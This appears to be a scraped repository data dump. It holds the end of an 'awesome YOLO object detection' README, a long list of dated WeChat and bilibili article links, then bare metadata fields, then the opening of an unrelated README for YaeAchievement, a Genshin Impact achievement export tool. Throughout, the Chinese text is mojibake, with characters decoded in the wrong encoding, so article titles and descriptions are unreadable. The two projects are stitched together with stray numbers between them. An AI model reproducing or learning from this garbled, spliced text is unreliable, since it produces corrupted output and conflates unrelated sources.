[2023-02-24๏ผŒYOLOv5ๅ…จ้ข่งฃๆžๆ•™็จ‹โ‘ค๏ผš่ฎก็ฎ—mAP็”จๅˆฐ็š„Numpyๅ‡ฝๆ•ฐ่ฏฆ่งฃ](https://mp.weixin.qq.com/s/ag7PkcRRSTppEG0GOysqpg) - [2023-03-09๏ผŒYOLOv5ๅ…จ้ข่งฃๆžๆ•™็จ‹โ‘ฅ๏ผšๆจกๅž‹่ฎญ็ปƒๆต็จ‹่ฏฆ่งฃ](https://mp.weixin.qq.com/s/RriWDozw7ZHTBg7Rr38dNw) - [2023-05-23๏ผŒYOLOv5ๅ…จ้ข่งฃๆžๆ•™็จ‹โ‘ฆ๏ผšไฝฟ็”จๆจกๅž‹่žๅˆๆๅ‡mAPๅ’ŒmAR](https://mp.weixin.qq.com/s/6PjD5k5o1GQO8v7jIydZ_w) - [2023-05-23๏ผŒYOLOv5ๅ…จ้ข่งฃๆžๆ•™็จ‹โ‘ง๏ผšๅฐ†่ฎญ็ปƒๅฅฝ็š„YOLOv5ๆƒ้‡ๅฏผไธบๅ…ถๅฎƒๆก†ๆžถๆ ผๅผ](https://mp.weixin.qq.com/s/4yiN7JZrvAvMi4m5eusbMw) - ๅพฎไฟกๅ…ฌไผ—ๅทใ€ŒAIWalkerใ€ - [2023-03-29๏ผŒChatGPTๆ˜ฏๅฆ‚ไฝ•็œ‹ๅพ…YOLO็ณปๅˆ—็ฎ—ๆณ•็š„่ดก็Œฎๅ‘ข๏ผŸ~ๅ“ˆๅ“ˆ~ ](https://mp.weixin.qq.com/s/E-TNeTKK5EV70zAenRVbwQ) - [2023-05-07๏ผŒYOLO-NAS | YOLOๆ–ฐ้ซ˜ๅบฆ๏ผŒๅผ•ๅ…ฅNAS๏ผŒๅ‡บไบŽYOLOv8่€Œไผ˜ไบŽYOLOv8](https://mp.weixin.qq.com/s/FsWSRguAn2WZKtmPhMbc6g) - [2023-05-16๏ผŒๅ…จ็ฝ‘ๅ”ฏไธ€ๅค็Žฐ๏ผๆ‰‹ๆœบ็ซฏ 1ms ็บงๅปถ่ฟŸ็š„ไธปๅนฒ็ฝ‘ๆจกๅž‹ MobileOne](https://mp.weixin.qq.com/s/Wk1sHIQKUe01PqMnpzcCfQ) - [2023-08-15๏ผŒๅ—ๅผ€ๅคงๅญฆๆๅ‡บYOLO-MS | ่ถ…่ถŠYOLOv8ไธŽRTMDet๏ผŒๅณๆ’ๅณ็”จๆ‰“็ ดๆ€ง่ƒฝ็“ถ้ขˆ](https://mp.weixin.qq.com/s/FfG9vNM_a2k_zflWfuimsw) - [2024-02-19๏ผŒU็‰ˆYOLO-Worldๆฅไบ†๏ผŒYOLOv8ๅ†ๅบฆๅ‡็บง๏ผŒไธ‰่กŒไปฃ็ ไธŠๆ‰‹YOLO-World](https://mp.weixin.qq.com/s/yepStVzyrOE4MsgFFuwo0Q) - [2024-02-23๏ผŒYOLOv9ๆฅไบ†๏ผŒๅฏ็ผ–็จ‹ๆขฏๅบฆไฟกๆฏไธŽๅนฟไน‰้ซ˜ๆ•ˆๅฑ‚่šๅˆ็ฝ‘็ปœ ๅŠฉๅŠ›ๅ…จๆ–ฐๆฃ€ๆต‹SOTAๅ‰ๆฒฟ](https://mp.weixin.qq.com/s/tFavH5_Sqtnq1_NMRt_AUg) - ๅพฎไฟกๅ…ฌไผ—ๅทใ€Œ่‘ฃ่‘ฃ็ฟๆ˜ฏไธชๆ”ปๅŸŽ็‹ฎใ€ - [2023-03-20๏ผŒไธ‡ๅญ—้•ฟๆ–‡่งฃๆžResnet50็š„็ฎ—ๆณ•ๅŽŸ็†](https://mp.weixin.qq.com/s/pA86udkaFzCogi2Qw8vBEA) - [2023-04-17๏ผŒไธ‡ๅญ—้•ฟๆ–‡ๅ…ฅ้—จ็ฅž็ป็ฝ‘็ปœ็กฌไปถๅŠ ้€Ÿ](https://mp.weixin.qq.com/s/3aNVGIPf5pLzEv67KI8M5w) - [2023-04-19๏ผŒCUDAๅท็งฏ็ฎ—ๅญๆ‰‹ๅ†™่ฏฆ็ป†ๅฎž็Žฐ](https://mp.weixin.qq.com/s/VlrglazJE54Xnm3tjM0uCg) - ๅพฎไฟกๅ…ฌไผ—ๅทใ€Œ่ฎก็ฎ—ๆœบ่ง†่ง‰ๆผซ่ฐˆใ€ - [2020-02-22๏ผŒYOLO v3ๅฎžๆˆ˜ไน‹้’ข็ญ‹ๆ•ฐ้‡AI่ฏ†ๅˆซ๏ผˆไธ€๏ผ‰](https://mp.weixin.qq.com/s/EElv2Tc73JKS8jpejEGB1w) - [2020-03-07๏ผŒYOLO v3ๅฎžๆˆ˜ไน‹้’ข็ญ‹ๆ™บ่ƒฝ่ฏ†ๅˆซๆ”น่ฟ›ๆ–นๆกˆๅˆ†ไบซ๏ผˆไบŒ๏ผ‰](https://mp.weixin.qq.com/s/lOeRqD2orcLw5FR496r4uw) - ๅพฎไฟกๅ…ฌไผ—ๅทใ€Œๆ™บ้€ ๆƒ…ๆŠฅๅฑ€ใ€ - [2022-11-07๏ผŒ้กน็›ฎๅฎžๆ“๏ผšๅŸบไบŽyolov5็š„PCB่กจ้ข็ผบ้™ทๆฃ€ๆต‹ใ€้™„ๅฎŒๆ•ดไปฃ็ ใ€‘](https://mp.weixin.qq.com/s/IzMabvYts2BEa5IvAwUfrg) - ๅพฎไฟกๅ…ฌไผ—ๅทใ€Œๅญฆๅงๅธฆไฝ ็ŽฉAIใ€ - [2022-11-21๏ผŒYOLOv5+Tesseract-OCR ๅฎž็Žฐ่ฝฆ็‰Œๅทๆ–‡ๆœฌ่ฏ†ๅˆซใ€ๅฎžๆˆ˜ใ€‘](https://mp.weixin.qq.com/s/52Woexamu697tozevSiyQQ) - ๅพฎไฟกๅ…ฌไผ—ๅทใ€Œ้‡ๅญไฝใ€ - [2023-01-12๏ผŒYOLOv8ๅทฒ่‡ณ๏ผŒ็ฒพๅบฆๅคงๆถจ๏ผๆ•™ไฝ ๅฆ‚ไฝ•ๅœจ่‡ชๅฎšไน‰ๆ•ฐๆฎ้›†ไธŠ่ฎญ็ปƒๅฎƒ](https://mp.weixin.qq.com/s/_ccYfjWm6CsH_vxpACUWEA) - ๅพฎไฟกๅ…ฌไผ—ๅทใ€Œ็ฌ‘ๅ‚ฒ็ฎ—ๆณ•ๆฑŸๆน–ใ€ - [2023-02-08๏ผŒไปฃ็ ๅฎžๆˆ˜๏ผšYOLOv5ๅฎž็Žฐ้’ขๆ่กจ้ข็ผบ้™ทๆฃ€ๆต‹](https://mp.weixin.qq.com/s/i_bF6_77MxKqEy7-y7LQdQ) - ๅพฎไฟกๅ…ฌไผ—ๅทใ€ŒOpenCVไธญๆ–‡็ฝ‘ใ€ - [2023-04-07๏ผŒYOLOv8 ๅ…จๅฎถๆกถๅ†่ฟŽๆ–ฐๆˆๅ‘˜๏ผๆ–ฐๅขžPose Estimationๆจกๅž‹!](https://mp.weixin.qq.com/s/wF93AAVnGsQtHdB-DkSTPQ) - ๅพฎไฟกๅ…ฌไผ—ๅทใ€Œๆทฑๅบฆๅญฆไน ไธŽ่ฎก็ฎ—ๆœบ่ง†่ง‰ใ€ - [2023-03-28๏ผŒไฝฟ็”จ YOLO ่ฟ›่กŒ็›ฎๆ ‡ๆฃ€ๆต‹๏ผšๅฆ‚ไฝ•ๆๅ–ไบบ็‰ฉๅ›พๅƒ](https://mp.weixin.qq.com/s/vthdOoy3etZmybMLaGzoFg) - ๅพฎไฟกๅ…ฌไผ—ๅทใ€Œๆœบๅ™จๅญฆไน ็ฎ—ๆณ•ๅทฅ็จ‹ๅธˆใ€ - [2023-04-19๏ผŒๆƒŠๅ‘†ไบ†๏ผๅŸบไบŽTransformer็š„ๆฃ€ๆต‹ๆจกๅž‹RT-DETR็ซŸ็„ถๆฏ”YOLO่ฟ˜ๅฟซ๏ผ](https://mp.weixin.qq.com/s/wgBaZ-CTB7B4nvYnobMDvw) - ๅพฎไฟกๅ…ฌไผ—ๅทใ€Œ่ฎก็ฎ—ๆœบ่ง†่ง‰ไธŽๆœบๅ™จๅญฆไน ใ€ - [2023-04-19๏ผŒRT-DETR | ๅŠๆ‰“YOLO็ณปๅˆ—็š„ DETR้ƒจ็ฝฒๆ•™็จ‹ๆฅๅ•ฆ๏ผŒไผ˜้›…่€Œ็ฎ€ๆด๏ผ](https://mp.weixin.qq.com/s/oflfbPkhj3ka2ExK7ZZ0VA) - [2023-05-16๏ผŒ่ถ…ๅผบ็›ฎๆ ‡ๆฃ€ๆต‹ๅ™จ RT-DETR | Python/C++ ไฟๅง†็บง้ƒจ็ฝฒๆ•™็จ‹๏ผŒไปŽๅ…ฅ้—จๅˆฐ็ฒพ้€š](https://mp.weixin.qq.com/s/XwmQILnaLtWPfo-dysLeAA) - ๅพฎไฟกๅ…ฌไผ—ๅทใ€Œไบบๅทฅๆ™บ่ƒฝๅ‰ๆฒฟ่ฎฒไน ใ€ - [2023-04-19๏ผŒใ€ๆบๅคดๆดปๆฐดใ€‘CVPR 2023 | AbSViT๏ผšๆ‹ฅๆœ‰่‡ชไธŠ่€Œไธ‹ๆณจๆ„ๅŠ›ๆœบๅˆถ็š„่ง†่ง‰Transformer](https://mp.weixin.qq.com/s/FtVd37tOXMfu92eDSvdvbg) - ๅพฎไฟกๅ…ฌไผ—ๅทใ€ŒAI็ง‘ๆŠ€ไธŽ็ฎ—ๆณ•็ผ–็จ‹ใ€ - [2023-04-11, YOLOv8 AS-One๏ผš็›ฎๆ ‡ๆฃ€ๆต‹AS-One ๆฅไบ†๏ผ๏ผˆYOLOๅฐฑๆ˜ฏๅๅ‰ฏๅ…ถๅฎž็š„ๅท็Ž‹ไน‹็Ž‹๏ผ‰](https://mp.weixin.qq.com/s/ofokLwCwgN1GNTqy3NuYmg) - ๅพฎไฟกๅ…ฌไผ—ๅทใ€Œๆทฑๅบฆๅญฆไน ไธŽNLPใ€ - [2023-04-24๏ผŒ[ไธ‡ๅญ—ๅนฒ่ดง]-ๅฆ‚ไฝ•็ป™ๆจกๅž‹ๅŠ ๅ…ฅๅ…ˆ้ชŒ็Ÿฅ่ฏ†๏ผŸ](https://mp.weixin.qq.com/s/RmM9ay4arJWBoNP11Bfbsw) - ๅพฎไฟกๅ…ฌไผ—ๅทใ€ŒOpenCVไธŽAIๆทฑๅบฆๅญฆไน ใ€ - [2023-04-23๏ผŒๅŸบไบŽ YOLOv8 ็š„่‡ชๅฎšไน‰ๆ•ฐๆฎ้›†่ฎญ็ปƒ](https://mp.weixin.qq.com/s/NrT7aFurdz5IRr3bCFsHQA) - [2023-06-19๏ผŒไธ€ๆ–‡ๅฝปๅบ•ๆžๆ‡‚YOLOv8ใ€็ฝ‘็ปœ็ป“ๆž„+ไปฃ็ +ๅฎžๆ“ใ€‘](https://mp.weixin.qq.com/s/HldcdtBXzh5YawcS0Bb4KQ) - [2023-07-04๏ผŒไฟๅง†ๆ•™็จ‹ | YOLOv5ๅœจๅปบ็ญ‘ๅทฅๅœฐไธญๅฎ‰ๅ…จๅธฝไฝฉๆˆดๆฃ€ๆต‹็š„ๅบ”็”จ](https://mp.weixin.qq.com/s/g6jEP5Y2R_DhrI30DBol5Q) - [2024-06-05๏ผŒๅฎžๆˆ˜ | YOLOv10 ่‡ชๅฎšไน‰ๆ•ฐๆฎ้›†่ฎญ็ปƒๅฎž็Žฐ่ฝฆ็‰Œๆฃ€ๆต‹ (ๆ•ฐๆฎ้›†+่ฎญ็ปƒ+้ข„ๆต‹ ไฟๅง†็บงๆ•™็จ‹)](https://mp.weixin.qq.com/s/3WSmGP7xdQJc-5YdQXBPFg) - ๅพฎไฟกๅ…ฌไผ—ๅทใ€ŒๅตŒๅ…ฅๅผ่ง†่ง‰ใ€ - [2023-04-28๏ผŒๆทฑๅบฆๅญฆไน ๆจกๅž‹ๅŽ‹็ผฉๆ–นๆณ•ๆฆ‚่ฟฐ](https://mp.weixin.qq.com/s/m4gZ1beM8QRzNegFPf3Mbg) - [2023-05-12๏ผŒๆจกๅž‹ๅŽ‹็ผฉ-ๅ‰ชๆž็ฎ—ๆณ•่ฏฆ่งฃ](https://mp.weixin.qq.com/s/7BCQD1s_1AZJoowivTnxOg) - ๅพฎไฟกๅ…ฌไผ—ๅทใ€Œๆœบๅ™จๅญฆไน ็ฎ—ๆณ•้‚ฃไบ›ไบ‹ใ€ - [2023-05-02๏ผŒlabelGo๏ผšๅŸบไบŽ YOLOv5 ็š„่พ…ๅŠฉๆ ‡ๆณจๅทฅๅ…ท](https://mp.weixin.qq.com/s/4EFTj6RxOCvX2Wn5euhSAQ) - ๅพฎไฟกๅ…ฌไผ—ๅทใ€Œไบบๅทฅๆ™บ่ƒฝๆŠ€ๆœฏไธŽๅ’จ่ฏขใ€ - [2023-05-19๏ผŒๅŸบไบŽYOLOv5็š„ๅ…‰ๅญฆ้ฅๆ„Ÿๅ›พๅƒ่ˆฐ่ˆน็›ฎๆ ‡ๆฃ€ๆต‹็ฎ—ๆณ•](https://mp.weixin.qq.com/s/Mic_wLbfjQrtX7wLwW1SiA) - [2023-06-06๏ผŒ้ขๅ‘ๅผน่ฝฝๅ›พๅƒ็š„ๆทฑๅบฆๅญฆไน ็ฝ‘็ปœๅŽ‹็ผฉๆ–นๆณ•็ ”็ฉถ](https://mp.weixin.qq.com/s/pBXUnMpSmLg1BTDrJ19tgQ) - ๅพฎไฟกๅ…ฌไผ—ๅทใ€ŒStrongerTangใ€ - [2022-10-07๏ผŒ่‡ชๅŠจ้ฉพ้ฉถๅคšๆจกๆ€่žๅˆๆ„Ÿ็Ÿฅ่ฏฆ่งฃ๏ผˆ็ ”็ฉถ็Žฐ็ŠถๅŠๆŒ‘ๆˆ˜๏ผ‰](https://mp.weixin.qq.com/s/g3KpWyc0QpLseN5-0CKySQ) - ๅพฎไฟกๅ…ฌไผ—ๅทใ€ŒๅŒ—ไบฌๅคงๅญฆ็Ž‹้€‰่ฎก็ฎ—ๆœบ็ ”็ฉถๆ‰€ใ€ - [2022-10-12๏ผŒNeurIPS 2022 | ้ขๅ‘่‡ชๅŠจ้ฉพ้ฉถๅคšๆจกๆ€ๆ„Ÿ็Ÿฅ็š„ๆฟ€ๅ…‰้›ท่พพ-็›ธๆœบ่žๅˆๆก†ๆžถ](https://mp.weixin.qq.com/s/anth7mIqTGpJ4QWvTDbiSQ) - ๅพฎไฟกๅ…ฌไผ—ๅทใ€Œ่ฎก็ฎ—ๆœบ่ง†่ง‰ๆทฑๅบฆๅญฆไน ๅ’Œ่‡ชๅŠจ้ฉพ้ฉถใ€ - [2022-05-31๏ผŒBEVFusion: ๅŸบไบŽ็ปŸไธ€BEV่กจๅพ็š„ๅคšไปปๅŠกๅคšไผ ๆ„Ÿๅ™จ่žๅˆ](https://mp.weixin.qq.com/s/maKDU3sXbPxlEFz372qZTA) - ๅพฎไฟกๅ…ฌไผ—ๅทใ€Œๅ†…ๆŽจๅ›SIRใ€ - [2023-07-28๏ผŒ้ข็ป | ่ฎก็ฎ—ๆœบ่ง†่ง‰ ้ข็ป22](https://mp.weixin.qq.com/s/3pUMSOq4-eS2N7WNtbv02A) - ๅพฎไฟกๅ…ฌไผ—ๅทใ€Œๅคๆœˆๅฑ…ใ€ - [2023-07-06๏ผŒYOLOv5่ฎญ็ปƒ่‡ชๅทฑ็š„ๆ•ฐๆฎ้›†(่ถ…่ฏฆ็ป†)](https://mp.weixin.qq.com/s/UshIczcC8l7eHNf2CSrMKw) - ๅพฎไฟกๅ…ฌไผ—ๅทใ€ŒStreamlitใ€ - [2023-05-18๏ผŒStreamlit+Opencvๆ‰“้€ ไบบ่„ธๅฎžๆ—ถ่ฏ†ๅˆซๅŠŸ่ƒฝ](https://mp.weixin.qq.com/s/I1HQ_E4UerZLkDT2-ch2SQ) - ๅพฎไฟกๅ…ฌไผ—ๅทใ€ŒFightingCVใ€ - [2022-08-17๏ผŒYOLOAir | ้ขๅ‘ๅฐ็™ฝ็š„็›ฎๆ ‡ๆฃ€ๆต‹ๅบ“๏ผŒๆ›ดๅฟซๆ›ดๆ–นไพฟๆ›ดๅฎŒๆ•ด็š„YOLOๅบ“](https://mp.weixin.qq.com/s/smwx-Ievs3rWMw_D4lSwqg) - [2023-07-29๏ผŒ่‡ชๅŠจ้ฉพ้ฉถๆ–ฐๆ–นๆณ•็™ปNatureๅฐ้ข๏ผš่ฎฉ้ป‘ๅคœๅฆ‚็™ฝๆ˜ผ่ˆฌๆธ…ๆ™ฐ๏ผŒๆต™ๅคงๅšๅฃซไธ€ไฝœ](https://mp.weixin.qq.com/s/bCUMjzc-Ws0_qjusFjM5Xw) - ๅพฎไฟกๅ…ฌไผ—ๅทใ€ŒAILab็ฌ”่ฎฐใ€ - [2023-06-08๏ผŒใ€ๆ–‡็Œฎใ€‘่ง†่ง‰transformer็ ”็ฉถ่ฟ›ๅฑ•โ€”โ€”ๅฒไธŠๆœ€ๅ…จ็ปผ่ฟฐ](https://mp.weixin.qq.com/s/zCbFEl8pvPIfjnfIgv8Hqw) - ๅพฎไฟกๅ…ฌไผ—ๅทใ€ŒCVerใ€ - [2023-08-02๏ผŒICCV 2023๏ฝœ็›ฎๆ ‡ๆฃ€ๆต‹ๆ–ฐ็ช็ ด๏ผAlignDet๏ผšๆ”ฏๆŒๅ„็ฑปๆฃ€ๆต‹ๅ™จๅฎŒๅ…จ่‡ช็›‘็ฃ้ข„่ฎญ็ปƒ็š„ๆก†ๆžถ](https://mp.weixin.qq.com/s/t7jlTyUP6UxplpythX0dOw) - ๅพฎไฟกๅ…ฌไผ—ๅทใ€Œๆˆ‘็ˆฑ่ฎก็ฎ—ๆœบ่ง†่ง‰ใ€ - [2023-06-09๏ผŒ[ๅฎž่ทต]YOLOv5ๆๅ‡10ๅ€ๆŽจ็†้€Ÿๅบฆ๏ผšๅˆฉ็”จTensorRT ๅœจJetson NXไธŠ็š„ๆจกๅž‹้ƒจ็ฝฒ](https://mp.weixin.qq.com/s/jWZuNKpVM4k5aDe2JmB-Tg) - ๅพฎไฟกๅ…ฌไผ—ๅทใ€Œ่‹ฑ็‰นๅฐ”็‰ฉ่”็ฝ‘ใ€ - [2022-08-11๏ผŒๅŸบไบŽ OpenVINOโ„ข๏ธ 2022.1 POT API ๅฎž็Žฐ YOLOv5 ๆจกๅž‹ INT8 ้‡ๅŒ– | ๅผ€ๅ‘่€…ๅฎžๆˆ˜](https://mp.weixin.qq.com/s/DTXVXwf_tPxwsWbSxBv9Sw) - ๅพฎไฟกๅ…ฌไผ—ๅทใ€Œๆ•ฐๆฎ็ง‘ๅญฆไธŽAIใ€ - [2023-06-22๏ผŒWin10็Žฏๅขƒไธ‹OpenVINO้ƒจ็ฝฒYOLOv5ๆจกๅž‹๏ผšไปŽ็†่ฎบๅˆฐๅฎž่ทต](https://mp.weixin.qq.com/s/v4y-vjsUrlow5EaP_VrF0A) - ๅพฎไฟกๅ…ฌไผ—ๅทใ€Œ้ƒญๅฐๅ–ต็ŽฉAIใ€ - [2023-06-22๏ผŒWin10็Žฏๅขƒไธ‹OpenVINO้ƒจ็ฝฒYOLOv5ๆจกๅž‹๏ผšไปŽ็†่ฎบๅˆฐๅฎž่ทต](https://mp.weixin.qq.com/s/v4y-vjsUrlow5EaP_VrF0A) - [2023-09-04๏ผŒ่ถ…่ฏฆ็ป† | ไฝฟ็”จYolov8่ฎญ็ปƒ่‡ชๅทฑ็š„ๆ•ฐๆฎ้›†](https://mp.weixin.qq.com/s/KdoZnQArI95eWvqHMeqO0A) - ๅพฎไฟกๅ…ฌไผ—ๅทใ€Œ้ƒญๅฐๅ–ต็ŽฉAIใ€ - [2023-02-13๏ผŒๅฆ‚ไฝ•็”จOpenVINOโ„ข่ฎฉYOLOv8่Žทๅพ—1000+ FPSๆ€ง่ƒฝ๏ผŸ](https://mp.weixin.qq.com/s/CroC5jiTh6OXGtFUbWLZwQ) - ๅพฎไฟกๅ…ฌไผ—ๅทใ€ŒAI่ง†็•Œๅผ•ๆ“Žใ€ - [2023-08-20๏ผŒFast-BEV็š„CUDA่ฝๅœฐ | 5.9msๅณๅฏๅฎž็Žฐ็Žฏ่ง†BEV 3Dๆฃ€ๆต‹่ฝๅœฐ๏ผไปฃ็ ๅผ€ๆบ](https://mp.weixin.qq.com/s/ypL9_QYcCFjxpdF9CrS2dw) - [2024-01-03๏ผŒShape-IoUๅผ€ๆบ | ๅŒๆ—ถๅ…ณๆณจBoxๅฝข็Šถๅ’Œๅฐบๅฏธ๏ผŒๅฎŒ็พŽ่ถ…่ถŠSIoU/EIoU/CIoU็ญ‰๏ผŒYOLOๅˆๆœ‰็ฆไบ†](https://mp.weixin.qq.com/s/sDOtseu4icePW2oQObMoWQ) - [2024-01-19๏ผŒYOLOv4ไธŽๅท็งฏๆณจๆ„ๅŠ›ไปฅๅŠViT็ป“ๅˆ็š„่ฟ›ๅŒ–็‰ˆๆœฌYOLO-Former๏ผŒ็ฒพๅบฆ็จณๆญฅๆๅ‡๏ผ](https://mp.weixin.qq.com/s/N-5nYylqOTx7tEISJYOuuw) - ๅพฎไฟกๅ…ฌไผ—ๅทใ€Œๅฐ็™ฝ็Žฉ่ฝฌPythonใ€ - [2023-12-22๏ผŒๅŸบไบŽ YOLOv8 ็š„็–ฒๅŠณ็Šถๆ€ๆฃ€ๆต‹ | ้™„ๆบ็ ](https://mp.weixin.qq.com/s/L_-Ii5QvnGgJwo5WYSUcVg) - [2024-01-22๏ผŒYOLO-NAS ๅฆ‚ไฝ•ๅฐ† YOLO-v8 ็”ฉๅœจ่บซๅŽ๏ผŸ](https://mp.weixin.qq.com/s/pc7TzlZSULNJwIS-liCdzg) - ๅพฎไฟกๅ…ฌไผ—ๅทใ€Œๆœบๅ™จไน‹ๅฟƒใ€ - [2024-02-23๏ผŒ็›ฎๆ ‡ๆฃ€ๆต‹ๆ–ฐSOTA๏ผšYOLOv9้—ฎไธ–๏ผŒๆ–ฐๆžถๆž„่ฎฉไผ ็ปŸๅท็งฏ้‡็„•็”Ÿๆœบ](https://mp.weixin.qq.com/s/HFyADfWKkyw0TivsqH6kXA) - ๅพฎไฟกๅ…ฌไผ—ๅทใ€Œ็ ็ง‘ๆ™บ่ƒฝใ€ - [2024-01-30๏ผŒๆจกๅž‹้ƒจ็ฝฒ็ณปๅˆ—๏ผš10x้€Ÿๅบฆๆๅ‡๏ผŒYoloV8็›ฎๆ ‡ๆฃ€ๆต‹ๆจกๅž‹็จ€็–ๅŒ–โ€”CPUไธŠ่ถ…500FPS](https://mp.weixin.qq.com/s/cWRObjaRvL6RgabSdSxVBQ) - [2024-02-19๏ผŒๅŸบไบŽYOLO-World+EfficientSAM็š„้›ถๆ ทๆœฌ็›ฎๆ ‡ๆฃ€ๆต‹ไธŽๅฎžไพ‹ๅˆ†ๅ‰ฒDemo](https://mp.weixin.qq.com/s/u4QBbOeNR48aF9YHWdCQsw) - [2024-02-23๏ผŒYOLOv9ๆฅไบ†! ๆŠ›ๅผ€ๆŸๅคฑๅ‡ฝๆ•ฐๅ’Œ็ฝ‘็ปœ็ป“ๆž„๏ผŒๆขไธชๅฏ็ผ–็จ‹ๆขฏๅบฆไฟกๆฏ่ง’ๅบฆ็ปง็ปญๅ‡็บง๏ผŒ็›ฎๆ ‡ๆฃ€ๆต‹ๆ–ฐSOTA๏ผ](https://mp.weixin.qq.com/s/TAv_GY3d-tPOX9fKZNBwig) - ๅพฎไฟกๅ…ฌไผ—ๅทใ€Œ่‡ชๅŠจ้ฉพ้ฉถDailyใ€ - [2024-02-23๏ผŒYOLOv9็ปˆไบŽๆฅไบ†๏ผ่ฟœ่ถ…็Žฐๆœ‰ๅฎžๆ—ถ็›ฎๆ ‡ๆฃ€ๆต‹ๅ™จ๏ผไฝฟ็”จPGIๅญฆไฝ ๆƒณๅญฆ๏ผ](https://mp.weixin.qq.com/s/1i76NbtC5DD1lPMIMa9f8w) - [2024-05-25๏ผŒYOLOv10ๆฅๅ•ฆ๏ผ็œŸๆญฃๅฎžๆ—ถ็ซฏๅˆฐ็ซฏ็›ฎๆ ‡ๆฃ€ๆต‹](https://mp.weixin.qq.com/s/xxgvub-Y4RJLjbpY6YNxCQ) - ๅพฎไฟกๅ…ฌไผ—ๅทใ€Œ3D่ง†่ง‰ๅทฅๅŠใ€ - [2024-02-23๏ผŒYOLOv9้œ‡ๆ’ผๆฅ่ขญ๏ผไฝฟ็”จๅฏ็ผ–็จ‹ๆขฏๅบฆไฟกๆฏๅญฆไน ไฝ ๆƒณๅญฆไน ็š„ๅ†…ๅฎน๏ผ](https://mp.weixin.qq.com/s/Fbd-jarVO4LyjlhdxgmnsA) - ๅพฎไฟกๅ…ฌไผ—ๅทใ€ŒDeepDrivingใ€ - [2023-07-21๏ผŒAIๆจกๅž‹้ƒจ็ฝฒ | TensorRTๆจกๅž‹INT8้‡ๅŒ–็š„Pythonๅฎž็Žฐ](https://mp.weixin.qq.com/s/IQTCUs8CcfgHxJCyV6cm3w) - ๅพฎไฟกๅ…ฌไผ—ๅทใ€ŒCSharpไธŽ่พน็ผ˜ๆจกๅž‹้ƒจ็ฝฒใ€ - [2024-06-04๏ผŒไฝฟ็”จ TensorRT C++ API ่ฐƒ็”จGPUๅŠ ้€Ÿ้ƒจ็ฝฒ YOLOv10 ๅฎž็Žฐ 500FPS ๆŽจ็†้€Ÿๅบฆโ€”โ€”ๅฟซๅˆฐ้ฃž่ตท๏ผ๏ผ](https://mp.weixin.qq.com/s/yijeZtkRhbQxuSE1AsyUhA) - ๅพฎไฟกๅ…ฌไผ—ๅทใ€ŒBestSongCใ€ - [2024-05-24๏ผŒๅŸบไบŽYOLO็ณปๅˆ—็ฎ—ๆณ•๏ผˆYOLOv5ใ€YOLOv6ใ€YOLOv8ไปฅๅŠYOLOv9๏ผ‰ๅ’ŒStreamlitๆก†ๆžถ็š„่กŒไบบๅคด็›”ๆฃ€ๆต‹็ณป็ปŸ](https://mp.weixin.qq.com/s/STAVjII8kAk3MMPbB9vJfQ) - [2024-05-30๏ผŒๅŸบไบŽYOLO็ณปๅˆ—็ฎ—ๆณ•ๅ’ŒStreamlitๆก†ๆžถ็š„ๅ…ญ็ฑปๆฐดๆžœ็›ฎๆ ‡ๆฃ€ๆต‹็ณป็ปŸ](https://mp.weixin.qq.com/s/ZIH1afBpKBa5DgvtHZU1Vg) - ๅพฎไฟกๅ…ฌไผ—ๅทใ€Œไบบๅทฅๆ™บ่ƒฝๅญฆไน ๆŒ‡ๅ—ใ€ - [2024-05-28๏ผŒ็”จ่‡ชๅทฑ็š„ๆ•ฐๆฎ้›†ๅฎžๆต‹YOLOv10ๆ•ˆๆžœ๏ผ](https://mp.weixin.qq.com/s/JlGvYGvPa5NyxjEXHLO6uA) ## Videos - bilibiliใ€Œๆˆ‘ๆ˜ฏๅ‚…ๅ‚…็Œชใ€ - [2022-12-14๏ผŒ่‡ชๅˆถๆทฑๅบฆๅญฆไน ๆŽจ็†ๆก†ๆžถ](https://www.bilibili.com/video/BV1HV4y1A7H8) - [2023-06-02๏ผŒไปŽ้›ถ่‡ชๅˆถๆทฑๅบฆๅญฆไน ๆŽจ็†ๆก†ๆžถ](https://www.bilibili.com/video/BV118411f7yM/) ## Star History ![Star History Chart](https://api.star-history.com/svg?repos=codingonion/awesome-yolo-object-detection&type=Date)
๐Ÿš€๐Ÿš€๐Ÿš€ A collection of some awesome public YOLO object detection series projects.
yolo,yolov5,onnx,tensorrt,object-detection,snn,attention,yolov8,autonomous-driving,spiking-neural-network
0
5
5
379
0
1
0
HolographicHat/YaeAchievement
๏ปฟ<div align="center"><img width="100" src="https://github.com/HolographicHat/YaeAchievement/blob/master/icon.ico"> # YaeAchievement ![GitHub](https://img.shields.io/badge/License-GPL--3.0-brightgreen?style=flat-square) ![GitHub release (latest by date)](https://img.shields.io/github/v/release/HolographicHat/YaeAchievement?color=brightgreen&label=Release&style=flat-square) ![GitHub issues](https://img.shields.io/github/issues/HolographicHat/YaeAchievement?label=Issues&style=flat-square) ![Downloads](https://img.shields.io/github/downloads/HolographicHat/YaeAchievement/total?color=brightgreen&label=Downloads&style=flat-square) ![PRs Welcome](https://img.shields.io/badge/PRs-welcome-brightgreen.svg?style=flat-square) ็ฎ€ไฝ“ไธญๆ–‡ | [English](README_EN.md) </div> - ๆ”ฏๆŒๅฏผๅ‡บๆ‰€ๆœ‰็ฑปๅˆซ็š„ๆˆๅฐฑ - ๆ”ฏๆŒๅฎ˜ๆœ๏ผŒๆธ ้“ๆœไธŽๅ›ฝ้™…ๆœ - ๆฒกๆœ‰็ช—ๅฃๅคงๅฐใ€ๆธธๆˆ่ฏญ่จ€็ญ‰่ฆๆฑ‚ ## ๅฏผๅ‡บๆ”ฏๆŒ > ๆŒ‰็…งๆ•ฐๅญ—้”ฎ้€‰ๆ‹ฉๅฏผๅ‡บๆ–นๅผ๏ผŒ<kbd>0</kbd> ไธบ้ป˜่ฎคๅฏผๅ‡บๆ–นๅผ 0. [ๆคฐ็พŠ](https://cocogoat.work/achievement) 1. [่ƒกๆกƒๅทฅๅ…ท็ฎฑ](https://github.com/DGP-Studio/Snap.HuTao) 2. [Paimon.moe](https://paimon.moe/achievement/) 3. [Seelie.me](https://seelie.me/achievements) 4. ่กจๆ ผๆ–‡ไปถ `.csv` 5. [ๅฏป็ฉบ](https://github.com/xunkong/xunkong) 6. [ๅŽŸ้ญ”ๅทฅๅ…ท็ฎฑ](https://apps.apple.com/app/id1663989619) 7. [TeyvatGuide](https://github.com/BTMuli/TeyvatGuide) 8. [UIAF](https://uigf.org/standards/UIAF.html) JSON ๆ–‡ไปถ ## ไฝฟ็”จ่ฏดๆ˜Ž โ†’ [Tutorial.md](Tutorial.md) ## ไธ‹่ฝฝๅœฐๅ€ 